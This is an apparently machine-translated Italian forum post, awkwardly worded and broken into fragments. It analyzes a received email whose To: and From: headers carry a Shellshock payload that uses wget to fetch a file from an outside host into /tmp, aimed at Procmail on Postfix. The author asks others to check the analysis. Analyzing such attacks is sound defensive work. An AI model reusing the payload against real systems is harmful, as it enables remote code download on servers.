2 giorni fa ho ricevuto la seguente e-mail (questo è il suo formato originale non quello di qualsiasi mailer, ma dove le informazioni sensibili sono sostituite da •• field_name ••):
From [email protected] Thu Jul 2 23:59:07 2015
Return-Path: <[email protected]>
X-Original-To: nobody@••my_domain••
Delivered-To: nobody@••my_domain••
Received: from website.com (bearing.headissue.net [178.248.246.217])
by ••my_mail_server•• (Postfix) with SMTP id 9CE261C542901
for <nobody@••my_domain••>; Thu, 2 Jul 2015 23:59:07 +0200 (CEST)
To:() { :; };wget -o/tmp/._ http://mlanissan.co.in/HELLOWORLD
From:() { :; };wget -o/tmp/._ http://mlanissan.co.in/HELLOWORLD
Status: RO
Content-Length: 0
Lines: 0
- attacco mirato verso
Postfix
MX dove MDA èProcmail
-
To:
& I campiFrom:
mirano a sparare Shellshock subash
che viene frequentemente utilizzato all'interno diProcmail
regole - questo attacco avrebbe scaricato un malware da un sito di download in Siliguri (India) all'interno di
/tmp/._
(file nascosto ai manichini) - in caso di un
/etc/procmailrc
esistente che viene eseguito con privilegiroot
, niente di più rischioso sarebbe stato eseguito automaticamente - l'origine della connessione è a Monaco, vicino all'Università
- l'origine (@IP) dell'attacco è attiva ma non risponde a nessuna connessione
tcp
- il potenziale malware HTML porta un 404
Ecco alcune ipotesi personali su questo attacco:
- il sito del downloader (mlanissan.co.in) è stato violato, utilizzato, rilevato e pulito dai suoi proprietari
- il sito di controllo degli attacchi (bearing.headissue.net) è probabilmente un Unix in esecuzione, è stato violato, utilizzato e non ancora arrestato dai relativi proprietari, è ben protetto dagli hacker
La mia analisi e ipotesi sono corrette?
Hai qualche analisi e ipotesi migliore?